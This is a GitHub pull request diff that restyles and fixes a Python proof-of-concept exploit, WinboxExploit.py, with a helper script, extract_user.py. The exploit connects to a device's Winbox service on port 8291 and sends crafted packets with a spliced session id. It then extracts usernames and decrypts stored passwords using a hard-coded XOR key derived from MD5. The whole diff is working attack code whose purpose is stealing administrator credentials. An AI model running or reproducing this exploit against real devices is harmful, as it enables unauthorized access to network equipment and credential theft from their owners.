Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PEP-8, python2 compatible and fix in decrypt_password function #4

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

PEP-8, python2 compatible and fix in decrypt_password function #4

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
59 changes: 30 additions & 29 deletions WinboxExploit.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,33 +30,34 @@
0x00, 0x02, 0x00, 0x00, 0x00]



if __name__ == "__main__":
try:
ip = sys.argv[1]
except:
print("Usage: python PoC.py [IP_ADDRESS]")

#Initialize Socket
s = socket.socket()
s.settimeout(3)
s.connect((ip, 8291))

#Convert to bytearray for manipulation
a = bytearray(a)
b = bytearray(b)

#Send hello and recieve the sesison id
s.send(a)
d = bytearray(s.recv(1024))

#Replace the session id in template
b[19] = d[38]

#Send the edited response
s.send(b)
d = bytearray(s.recv(1024))

#Get results
print(ip)
dump(d[55:])
try:
ip = sys.argv[1]
except:
print("Usage: python PoC.py [IP_ADDRESS]")
exit(1)

#Initialize Socket
s = socket.socket()
s.settimeout(3)
s.connect((ip, 8291))

#Convert to bytearray for manipulation
a = bytearray(a)
b = bytearray(b)

#Send hello and recieve the sesison id
s.send(a)
d = bytearray(s.recv(1024))

#Replace the session id in template
b[19] = d[38]

#Send the edited response
s.send(b)
d = bytearray(s.recv(1024))

#Get results
print("IP: %s" % ip)
print('')
dump(d[55:])
23 changes: 14 additions & 9 deletions extract_user.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,16 +1,19 @@
#!/usr/bin/env python3

import sys, hashlib
import sys
import hashlib


def decrypt_password(user, pass_enc):
key = hashlib.md5(user + b"283i4jfkai3389").digest()

passw = ""
for i in range(0, len(pass_enc)):
passw += chr(pass_enc[i] ^ key[i % len(key)])
passw += chr(pass_enc[i] ^ ord(key[i % len(key)]))

return passw.split("\x00")[0]


def extract_user_pass_from_entry(entry):
user_data = entry.split(b"\x01\x00\x00\x21")[1]
pass_data = entry.split(b"\x11\x00\x00\x21")[1]
Expand All @@ -23,8 +26,8 @@ def extract_user_pass_from_entry(entry):

return username, password

def get_pair(data):

def get_pair(data):
user_list = []

entries = data.split(b"M2")[1:]
Expand All @@ -35,18 +38,20 @@ def get_pair(data):
continue

pass_plain = decrypt_password(user, pass_encrypted)
user = user.decode("ascii")
user = user.decode("ascii")

user_list.append((user, pass_plain))

return user_list


def dump(data):
user_pass = get_pair(data)
for u, p in user_pass:
print("User:", u)
print("Pass:", p)
print()
print("User: %s" % u)
print("Pass: %s" % p)
print('')


if __name__ == "__main__":
if len(sys.argv) == 2:
Expand All @@ -55,7 +60,7 @@ def dump(data):
else:
user_file = open(sys.argv[1], "rb").read()
dump(user_file)

else:
print("Usage:")
print("\tFrom file: \t", sys.argv[0], "user.dat")
Expand Down